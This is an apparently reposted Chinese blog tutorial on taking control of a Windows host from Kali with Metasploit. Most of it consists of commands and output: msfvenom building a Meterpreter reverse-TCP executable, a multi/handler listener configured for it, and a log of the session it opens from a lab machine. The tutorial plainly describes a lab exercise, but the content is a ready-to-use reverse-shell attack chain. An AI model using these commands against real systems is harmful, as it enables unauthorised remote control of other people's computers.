码迷,mamicode.com
首页 > Windows程序 > 详细

kali中利用Metasploit进行windows主机控制

时间:2018-02-24 18:02:46      阅读:790      评论:0      收藏:0      [点我收藏+]

标签:kali   msf   渗透;   shellcode   

网络拓扑:
1.生成shellcode:
root@debian:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.152.131 lport=1211 -f exe > /root/shell.exe

2.侦听shellcode:
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.152.131
lhost => 192.168.152.131
msf exploit(multi/handler) > set lport 1211
lport => 1211
msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.152.131:1211

3.将生成的sehllcode上传至windows主机中并运行:
技术分享图片

4.已经有session返回
msf exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.152.131:1211

[] Sending stage (179779 bytes) to 192.168.152.129
[
] Meterpreter session 1 opened (192.168.152.131:1211 -> 192.168.152.129:1039) at 2018-02-24 07:58:44 +0000
5.成功拿到shell:
技术分享图片

kali中利用Metasploit进行windows主机控制

标签:kali   msf   渗透;   shellcode   

原文地址:http://blog.51cto.com/13319402/2072672

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!